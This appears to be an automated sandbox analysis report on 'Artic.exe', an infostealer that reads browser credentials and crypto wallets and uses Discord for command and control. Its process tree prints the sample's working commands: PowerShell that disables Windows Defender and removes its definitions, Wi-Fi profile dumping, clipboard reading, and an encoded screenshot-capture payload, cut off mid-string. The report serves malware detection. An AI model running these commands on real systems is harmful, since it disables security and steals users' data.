f0fd55719640ba0ce349df5e3de0b043ba11f53551e6454129240b488df673b1

Resubmissions

10/07/2024, 08:20

240710-j8jq2sxajj 10

10/07/2024, 08:18

240710-j7pwnsyfkd 10

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
10/07/2024, 08:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Artic.exe
Size

7.4MB
MD5

b1da93350f3c968fc3632997ab5a9ac2
SHA1

b8f9388e3b29218b6860167c825dfece6d5adfa8
SHA256

f0fd55719640ba0ce349df5e3de0b043ba11f53551e6454129240b488df673b1
SHA512

aeb24ffe86ec47cb6b1236840af065f8cfef781ff455bef5b5f4da157e13ef8d88c965ddd91fb0c785028c3c32370b2a39375c133cd9d38feb32282952d0e688
SSDEEP

98304:63VeYgZhU0way6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3zCUTVv9JT1sOBNJ:6wYS6UOshoKMuIkhVastRL5Di3u01D7J

Score

8^/10

execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4800	powershell.exe
2252	powershell.exe
4596	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Artic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
3796	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe
2580	Artic.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023446-21.dat	upx
behavioral2/memory/2580-25-0x00007FFB02430000-0x00007FFB02A19000-memory.dmp	upx
behavioral2/files/0x0007000000023439-27.dat	upx
behavioral2/files/0x0007000000023444-29.dat	upx
behavioral2/memory/2580-43-0x00007FFB19820000-0x00007FFB1982F000-memory.dmp	upx
behavioral2/memory/2580-42-0x00007FFB15C60000-0x00007FFB15C83000-memory.dmp	upx
behavioral2/files/0x000700000002343b-41.dat	upx
behavioral2/files/0x000700000002343a-40.dat	upx
behavioral2/files/0x0007000000023438-39.dat	upx
behavioral2/files/0x000700000002344b-38.dat	upx
behavioral2/files/0x000700000002344a-37.dat	upx
behavioral2/files/0x0007000000023449-36.dat	upx
behavioral2/files/0x0007000000023445-33.dat	upx
behavioral2/files/0x0007000000023443-32.dat	upx
behavioral2/files/0x0007000000023440-48.dat	upx
behavioral2/files/0x000700000002343f-47.dat	upx
behavioral2/files/0x000700000002343e-46.dat	upx
behavioral2/files/0x000700000002343d-45.dat	upx
behavioral2/files/0x000700000002343c-44.dat	upx
behavioral2/memory/2580-54-0x00007FFB11F10000-0x00007FFB11F3D000-memory.dmp	upx
behavioral2/memory/2580-58-0x00007FFB17720000-0x00007FFB17739000-memory.dmp	upx
behavioral2/memory/2580-60-0x00007FFB11650000-0x00007FFB117C7000-memory.dmp	upx
behavioral2/memory/2580-59-0x00007FFB11F60000-0x00007FFB11F83000-memory.dmp	upx
behavioral2/memory/2580-64-0x00007FFB191C0000-0x00007FFB191CD000-memory.dmp	upx
behavioral2/memory/2580-63-0x00007FFB174C0000-0x00007FFB174D9000-memory.dmp	upx
behavioral2/memory/2580-66-0x00007FFB11E10000-0x00007FFB11E43000-memory.dmp	upx
behavioral2/memory/2580-68-0x00007FFB11C50000-0x00007FFB11D1D000-memory.dmp	upx
behavioral2/memory/2580-71-0x00007FFB01960000-0x00007FFB01E80000-memory.dmp	upx
behavioral2/memory/2580-77-0x00007FFB15E00000-0x00007FFB15E0D000-memory.dmp	upx
behavioral2/memory/2580-79-0x00007FFB15C60000-0x00007FFB15C83000-memory.dmp	upx
behavioral2/memory/2580-80-0x00007FFB01840000-0x00007FFB0195C000-memory.dmp	upx
behavioral2/memory/2580-76-0x00007FFB15E40000-0x00007FFB15E54000-memory.dmp	upx
behavioral2/memory/2580-75-0x00007FFB02430000-0x00007FFB02A19000-memory.dmp	upx
behavioral2/memory/2580-181-0x00007FFB11F60000-0x00007FFB11F83000-memory.dmp	upx
behavioral2/memory/2580-182-0x00007FFB11650000-0x00007FFB117C7000-memory.dmp	upx
behavioral2/memory/2580-269-0x00007FFB174C0000-0x00007FFB174D9000-memory.dmp	upx
behavioral2/memory/2580-309-0x00007FFB01840000-0x00007FFB0195C000-memory.dmp	upx
behavioral2/memory/2580-306-0x00007FFB01960000-0x00007FFB01E80000-memory.dmp	upx
behavioral2/memory/2580-305-0x00007FFB11C50000-0x00007FFB11D1D000-memory.dmp	upx
behavioral2/memory/2580-304-0x00007FFB11E10000-0x00007FFB11E43000-memory.dmp	upx
behavioral2/memory/2580-295-0x00007FFB02430000-0x00007FFB02A19000-memory.dmp	upx
behavioral2/memory/2580-301-0x00007FFB11650000-0x00007FFB117C7000-memory.dmp	upx
behavioral2/memory/2580-296-0x00007FFB15C60000-0x00007FFB15C83000-memory.dmp	upx
behavioral2/memory/2580-310-0x00007FFB02430000-0x00007FFB02A19000-memory.dmp	upx
behavioral2/memory/2580-335-0x00007FFB11C50000-0x00007FFB11D1D000-memory.dmp	upx
behavioral2/memory/2580-338-0x00007FFB01840000-0x00007FFB0195C000-memory.dmp	upx
behavioral2/memory/2580-337-0x00007FFB15E40000-0x00007FFB15E54000-memory.dmp	upx
behavioral2/memory/2580-336-0x00007FFB01960000-0x00007FFB01E80000-memory.dmp	upx
behavioral2/memory/2580-334-0x00007FFB11E10000-0x00007FFB11E43000-memory.dmp	upx
behavioral2/memory/2580-333-0x00007FFB15E00000-0x00007FFB15E0D000-memory.dmp	upx
behavioral2/memory/2580-332-0x00007FFB174C0000-0x00007FFB174D9000-memory.dmp	upx
behavioral2/memory/2580-331-0x00007FFB11650000-0x00007FFB117C7000-memory.dmp	upx
behavioral2/memory/2580-330-0x00007FFB11F60000-0x00007FFB11F83000-memory.dmp	upx
behavioral2/memory/2580-329-0x00007FFB17720000-0x00007FFB17739000-memory.dmp	upx
behavioral2/memory/2580-328-0x00007FFB11F10000-0x00007FFB11F3D000-memory.dmp	upx
behavioral2/memory/2580-327-0x00007FFB19820000-0x00007FFB1982F000-memory.dmp	upx
behavioral2/memory/2580-326-0x00007FFB15C60000-0x00007FFB15C83000-memory.dmp	upx
behavioral2/memory/2580-325-0x00007FFB191C0000-0x00007FFB191CD000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	discord.com
30	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
27	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2188	WMIC.exe
4992	WMIC.exe
1532	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
1480	tasklist.exe
1380	tasklist.exe
1596	tasklist.exe
2124	tasklist.exe
1264	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
212	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4800	powershell.exe
4800	powershell.exe
940	powershell.exe
940	powershell.exe
2252	powershell.exe
2252	powershell.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
4596	powershell.exe
4596	powershell.exe
4596	powershell.exe
1728	powershell.exe
1728	powershell.exe
3652	powershell.exe
3652	powershell.exe
4792	powershell.exe
4792	powershell.exe
3784	powershell.exe
3784	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	1480	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3172	WMIC.exe
Token: SeSecurityPrivilege	3172	WMIC.exe
Token: SeTakeOwnershipPrivilege	3172	WMIC.exe
Token: SeLoadDriverPrivilege	3172	WMIC.exe
Token: SeSystemProfilePrivilege	3172	WMIC.exe
Token: SeSystemtimePrivilege	3172	WMIC.exe
Token: SeProfSingleProcessPrivilege	3172	WMIC.exe
Token: SeIncBasePriorityPrivilege	3172	WMIC.exe
Token: SeCreatePagefilePrivilege	3172	WMIC.exe
Token: SeBackupPrivilege	3172	WMIC.exe
Token: SeRestorePrivilege	3172	WMIC.exe
Token: SeShutdownPrivilege	3172	WMIC.exe
Token: SeDebugPrivilege	3172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3172	WMIC.exe
Token: SeRemoteShutdownPrivilege	3172	WMIC.exe
Token: SeUndockPrivilege	3172	WMIC.exe
Token: SeManageVolumePrivilege	3172	WMIC.exe
Token: 33	3172	WMIC.exe
Token: 34	3172	WMIC.exe
Token: 35	3172	WMIC.exe
Token: 36	3172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3172	WMIC.exe
Token: SeSecurityPrivilege	3172	WMIC.exe
Token: SeTakeOwnershipPrivilege	3172	WMIC.exe
Token: SeLoadDriverPrivilege	3172	WMIC.exe
Token: SeSystemProfilePrivilege	3172	WMIC.exe
Token: SeSystemtimePrivilege	3172	WMIC.exe
Token: SeProfSingleProcessPrivilege	3172	WMIC.exe
Token: SeIncBasePriorityPrivilege	3172	WMIC.exe
Token: SeCreatePagefilePrivilege	3172	WMIC.exe
Token: SeBackupPrivilege	3172	WMIC.exe
Token: SeRestorePrivilege	3172	WMIC.exe
Token: SeShutdownPrivilege	3172	WMIC.exe
Token: SeDebugPrivilege	3172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3172	WMIC.exe
Token: SeRemoteShutdownPrivilege	3172	WMIC.exe
Token: SeUndockPrivilege	3172	WMIC.exe
Token: SeManageVolumePrivilege	3172	WMIC.exe
Token: 33	3172	WMIC.exe
Token: 34	3172	WMIC.exe
Token: 35	3172	WMIC.exe
Token: 36	3172	WMIC.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	WMIC.exe
Token: SeSecurityPrivilege	2188	WMIC.exe
Token: SeTakeOwnershipPrivilege	2188	WMIC.exe
Token: SeLoadDriverPrivilege	2188	WMIC.exe
Token: SeSystemProfilePrivilege	2188	WMIC.exe
Token: SeSystemtimePrivilege	2188	WMIC.exe
Token: SeProfSingleProcessPrivilege	2188	WMIC.exe
Token: SeIncBasePriorityPrivilege	2188	WMIC.exe
Token: SeCreatePagefilePrivilege	2188	WMIC.exe
Token: SeBackupPrivilege	2188	WMIC.exe
Token: SeRestorePrivilege	2188	WMIC.exe
Token: SeShutdownPrivilege	2188	WMIC.exe
Token: SeDebugPrivilege	2188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2188	WMIC.exe
Token: SeRemoteShutdownPrivilege	2188	WMIC.exe
Token: SeUndockPrivilege	2188	WMIC.exe
Token: SeManageVolumePrivilege	2188	WMIC.exe
Token: 33	2188	WMIC.exe
Token: 34	2188	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1044 wrote to memory of 2580	1044	Artic.exe	82
PID 1044 wrote to memory of 2580	1044	Artic.exe	82
PID 2580 wrote to memory of 3952	2580	Artic.exe	86
PID 2580 wrote to memory of 3952	2580	Artic.exe	86
PID 2580 wrote to memory of 384	2580	Artic.exe	87
PID 2580 wrote to memory of 384	2580	Artic.exe	87
PID 2580 wrote to memory of 4168	2580	Artic.exe	90
PID 2580 wrote to memory of 4168	2580	Artic.exe	90
PID 2580 wrote to memory of 1356	2580	Artic.exe	92
PID 2580 wrote to memory of 1356	2580	Artic.exe	92
PID 3952 wrote to memory of 4800	3952	cmd.exe	94
PID 3952 wrote to memory of 4800	3952	cmd.exe	94
PID 4168 wrote to memory of 1480	4168	cmd.exe	95
PID 4168 wrote to memory of 1480	4168	cmd.exe	95
PID 1356 wrote to memory of 3172	1356	cmd.exe	97
PID 1356 wrote to memory of 3172	1356	cmd.exe	97
PID 384 wrote to memory of 940	384	cmd.exe	98
PID 384 wrote to memory of 940	384	cmd.exe	98
PID 2580 wrote to memory of 3804	2580	Artic.exe	144
PID 2580 wrote to memory of 3804	2580	Artic.exe	144
PID 3804 wrote to memory of 3476	3804	cmd.exe	102
PID 3804 wrote to memory of 3476	3804	cmd.exe	102
PID 2580 wrote to memory of 3308	2580	Artic.exe	103
PID 2580 wrote to memory of 3308	2580	Artic.exe	103
PID 3308 wrote to memory of 1504	3308	cmd.exe	105
PID 3308 wrote to memory of 1504	3308	cmd.exe	105
PID 2580 wrote to memory of 4360	2580	Artic.exe	106
PID 2580 wrote to memory of 4360	2580	Artic.exe	106
PID 4360 wrote to memory of 2188	4360	cmd.exe	108
PID 4360 wrote to memory of 2188	4360	cmd.exe	108
PID 2580 wrote to memory of 452	2580	Artic.exe	109
PID 2580 wrote to memory of 452	2580	Artic.exe	109
PID 452 wrote to memory of 4992	452	cmd.exe	111
PID 452 wrote to memory of 4992	452	cmd.exe	111
PID 2580 wrote to memory of 3608	2580	Artic.exe	112
PID 2580 wrote to memory of 3608	2580	Artic.exe	112
PID 3608 wrote to memory of 2252	3608	cmd.exe	114
PID 3608 wrote to memory of 2252	3608	cmd.exe	114
PID 2580 wrote to memory of 4172	2580	Artic.exe	115
PID 2580 wrote to memory of 4172	2580	Artic.exe	115
PID 2580 wrote to memory of 840	2580	Artic.exe	116
PID 2580 wrote to memory of 840	2580	Artic.exe	116
PID 840 wrote to memory of 1380	840	cmd.exe	119
PID 840 wrote to memory of 1380	840	cmd.exe	119
PID 4172 wrote to memory of 1596	4172	cmd.exe	120
PID 4172 wrote to memory of 1596	4172	cmd.exe	120
PID 2580 wrote to memory of 3872	2580	Artic.exe	121
PID 2580 wrote to memory of 3872	2580	Artic.exe	121
PID 2580 wrote to memory of 4508	2580	Artic.exe	122
PID 2580 wrote to memory of 4508	2580	Artic.exe	122
PID 2580 wrote to memory of 4984	2580	Artic.exe	124
PID 2580 wrote to memory of 4984	2580	Artic.exe	124
PID 2580 wrote to memory of 2036	2580	Artic.exe	126
PID 2580 wrote to memory of 2036	2580	Artic.exe	126
PID 2580 wrote to memory of 3320	2580	Artic.exe	128
PID 2580 wrote to memory of 3320	2580	Artic.exe	128
PID 3872 wrote to memory of 4432	3872	cmd.exe	131
PID 3872 wrote to memory of 4432	3872	cmd.exe	131
PID 4508 wrote to memory of 2288	4508	cmd.exe	132
PID 4508 wrote to memory of 2288	4508	cmd.exe	132
PID 4984 wrote to memory of 2124	4984	cmd.exe	133
PID 4984 wrote to memory of 2124	4984	cmd.exe	133
PID 3320 wrote to memory of 3468	3320	cmd.exe	134
PID 3320 wrote to memory of 3468	3320	cmd.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
876	attrib.exe
1728	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Artic.exe
"C:\Users\Admin\AppData\Local\Temp\Artic.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Users\Admin\AppData\Local\Temp\Artic.exe
  "C:\Users\Admin\AppData\Local\Temp\Artic.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Artic.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Artic.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4168
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3804
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:840
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2036
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1748
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1684
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuA